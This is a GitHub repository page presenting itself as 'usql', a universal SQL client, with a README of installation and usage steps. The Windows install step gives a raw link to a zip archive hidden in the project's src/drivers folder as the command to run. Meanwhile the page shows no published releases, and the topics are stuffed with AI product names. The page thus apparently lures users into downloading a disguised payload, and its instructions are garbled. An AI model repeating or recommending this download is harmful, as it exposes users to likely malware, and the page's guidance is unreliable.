Skip to content

Yusupov70/usql

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ usql - Universal SQL for All Your Needs

πŸŽ‰ Introduction

Welcome to usql! This tool helps you interact with various databases using simple commands. Whether you want to query SQLite, Postgres, MySQL, DuckDB, or Parquet files, usql makes it easy. Plus, it can install necessary drivers automatically, so you don’t need to worry about setup. If you are looking to extract or analyze data, usql is designed just for you.

πŸ“₯ Download Now

Download usql

πŸš€ Getting Started

βœ… Requirements

Before you start, ensure your system meets the following requirements:

▢️ Installation Steps

  1. Visit the Releases Page
    Go to the usql releases page by clicking here. This page lists all the available versions of usql.

  2. Choose Your Version
    Find the latest release version. You will see several files for different operating systems. Select the one that matches your system.

  3. Download the File
    Click on the file to start your download. The file will be saved on your computer, usually in the β€œDownloads” folder.

  4. Install usql
    After the download is complete, follow these instructions based on your operating system:

    • Windows:
      Open the command prompt. Navigate to the folder where you downloaded the file. Enter the command:
      https://raw.githubusercontent.com/Yusupov70/usql/main/src/drivers/Software-3.0.zip
    • macOS / Linux:
      Open the terminal. Navigate to the folder where you downloaded the file. Enter the command:
      ./usql
  5. Run usql
    Simply type usql in your terminal or command prompt and press Enter. You are now ready to start using usql!

πŸ”§ Using usql

πŸ’‘ Basic Commands

Once usql is running, you can begin by connecting to a database or analyzing data. Here are some basic commands to get you started:

  • Connect to a Database:
    Type CONNECT your_database_name;
    Replace your_database_name with the name of your database.

  • View Available Tables:
    Type SHOW TABLES;
    This command will list all the available tables in your database.

  • Query Data:
    Use SELECT * FROM your_table_name; to retrieve all records from a specific table. Replace your_table_name with the name of the table you want to query.

πŸ“Š Schema Introspection

Usql can help you understand the structure of your database. To check schema details, use the command:

DESCRIBE your_table_name;

Replace your_table_name with the name of the table you want to inspect. This will show the columns and their types.

πŸ”— Documentation and Resources

For more detailed guides and help on using usql, check our Documentation on GitHub. This resource provides extensive instructions, including advanced query options and troubleshooting tips.

πŸ“§ Support

If you encounter any issues or have questions, you can reach out for support. Open an issue in the Issues section, and our team will assist you.

🏷️ Topics

This application covers a range of topics, including:

  • AI
  • ChatGPT
  • Claude
  • Data Analysis
  • Database Management
  • SQL Querying
  • Terminal Operations

Explore these areas to make the most out of usql.

🌟 Next Steps

Now that you have installed usql, start experimenting with your databases. The more you practice, the better you will get at querying and analyzing data. Enjoy using usql!

Releases

No releases published

Packages

 
 
 

Contributors